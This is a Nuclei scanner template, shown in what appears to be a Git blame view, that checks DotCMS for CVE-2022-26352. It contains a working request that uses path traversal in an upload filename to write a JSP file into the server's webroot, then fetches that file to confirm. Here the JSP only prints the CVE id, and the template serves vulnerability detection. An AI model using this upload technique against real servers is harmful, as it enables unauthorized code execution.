nuclei-templates/cves/2022/CVE-2022-26352.yaml

45 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2022-26352
info:
name: DotCMS - Arbitrary File Upload
author: h1ei1
severity: critical
description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.
reference:
- https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
- https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352
Restoring Empty Lines (#4340) * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-34621.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-35464.yaml by mp * Enhancement: cves/2021/CVE-2021-35587.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Spacing and spelling * remove blank lines introduced by dashboard * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-18818.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-3396.yaml by mp * Enhancement: cves/2019/CVE-2019-3929.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-7238.yaml by mp * Enhancement: cves/2019/CVE-2019-7256.yaml by mp * Enhancement: cves/2019/CVE-2019-7609.yaml by mp * Enhancement: cves/2019/CVE-2019-8982.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2005/CVE-2005-2428.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-11546.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-17453.yaml by mp * Enhancement: cves/2020/CVE-2020-19360.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-23575.yaml by mp * Enhancement: cves/2020/CVE-2020-24223.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-14092.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * standardizing enhanced by tag * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines Co-authored-by: sullo <sullo@cirt.net>
2022-05-10 07:05:15 +00:00
classification:
cve-id: CVE-2022-26352
tags: cve,cve2022,rce,dotcms
requests:
- raw:
- |
POST /api/content/ HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3
--------------------------aadc326f7ae3eac3
Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp"
Content-Type: text/plain
<%
out.println("CVE-2022-26352");
%>
--------------------------aadc326f7ae3eac3--
- |
GET /{{randstr}}.jsp HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "CVE-2022-26352")'
- 'status_code_2 == 200'
Restoring Empty Lines (#4340) * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-34621.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-35464.yaml by mp * Enhancement: cves/2021/CVE-2021-35587.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Spacing and spelling * remove blank lines introduced by dashboard * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-18818.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-3396.yaml by mp * Enhancement: cves/2019/CVE-2019-3929.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-7238.yaml by mp * Enhancement: cves/2019/CVE-2019-7256.yaml by mp * Enhancement: cves/2019/CVE-2019-7609.yaml by mp * Enhancement: cves/2019/CVE-2019-8982.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2005/CVE-2005-2428.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-11546.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-17453.yaml by mp * Enhancement: cves/2020/CVE-2020-19360.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-23575.yaml by mp * Enhancement: cves/2020/CVE-2020-24223.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-14092.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * standardizing enhanced by tag * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines Co-authored-by: sullo <sullo@cirt.net>
2022-05-10 07:05:15 +00:00
condition: and
# Enhanced by mp on 2022/05/19